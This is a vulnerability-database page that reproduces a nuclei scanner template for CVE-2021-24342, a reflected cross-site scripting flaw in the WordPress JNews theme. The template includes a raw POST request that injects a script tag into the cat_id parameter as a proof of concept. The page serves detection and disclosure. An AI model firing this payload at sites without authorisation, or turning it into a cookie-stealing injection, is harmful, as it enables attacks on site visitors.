Lucene search
K

WordPress JNews Theme <8.0.6 - Cross-Site Scripting

🗓️ 03 Jun 2026 06:04:49Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 27 Views

WordPress JNews Theme <8.0.6 contains a reflected cross-site scripting vulnerability that allows injection of malicious script

Related
Refs
Code
ReporterTitlePublishedViews
Family
CNNVD
WordPress 插件 跨站脚本漏洞
7 Jun 202100:00
cnnvd
CNVD
WordPress Plugin Cross-Site Scripting Vulnerability (CNVD-2021-59603)
24 Jun 202100:00
cnvd
CVE
CVE-2021-24342
7 Jun 202110:49
cve
Cvelist
CVE-2021-24342 JNews < 8.0.6 - Reflected Cross-Site Scripting (XSS)
7 Jun 202110:49
cvelist
EUVD
EUVD-2021-11255
7 Oct 202500:30
euvd
NVD
CVE-2021-24342
7 Jun 202111:15
nvd
OSV
CVE-2021-24342
7 Jun 202111:15
osv
Patchstack
WordPress JNews premium theme <= 8.0.5 - Reflected Cross-Site Scripting (XSS) vulnerability
24 May 202100:00
patchstack
Prion
Cross site scripting
7 Jun 202111:15
prion
RedhatCVE
CVE-2021-24342
22 May 202519:21
redhatcve
Rows per page
id: CVE-2021-24342

info:
  name: WordPress JNews Theme <8.0.6 - Cross-Site Scripting
  author: pikpikcu
  severity: medium
  description: WordPress JNews theme before 8.0.6 contains a reflected cross-site scripting vulnerability. It does not sanitize the cat_id parameter in the POST request /?ajax-request=jnews (with action=jnews_build_mega_category_*).
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
  remediation: |
    Update to the latest version of the WordPress JNews Theme (>=8.0.6) to mitigate the XSS vulnerability.
  reference:
    - https://wpscan.com/vulnerability/415ca763-fe65-48cb-acd3-b375a400217e
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24342
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-24342
    cwe-id: CWE-79
    epss-score: 0.02284
    epss-percentile: 0.84978
    cpe: cpe:2.3:a:jnews:jnews:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: jnews
    product: jnews
    framework: wordpress
  tags: cve2021,cve,wordpress,xss,wp-plugin,wpscan,jnews,vuln
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/themes/jnews/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        internal: true
        words:
          - 'Change Log:'
          - 'JNews -'
        condition: and

  - raw:
      - |
        POST /?ajax-request=jnews HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        lang=en_US&cat_id=6"></script><script>alert(document.domain)</script>&action=jnews_build_mega_category_2&number=6&tags=70%2C64%2C10%2C67

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '</script><script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - 'Content-Type: text/html'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100c0fce69e156b60e1075bf963952537b12e6565cf9ee75930cede88d52f1bc77902203c0bf59e4c091b7b27893f51166ee0acc9c116718f7bb4123aff1b1d3825e2f5:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.2Medium risk
Vulners AI Score6.2
CVSS 24.3
CVSS 3.16.1
EPSS0.02284
27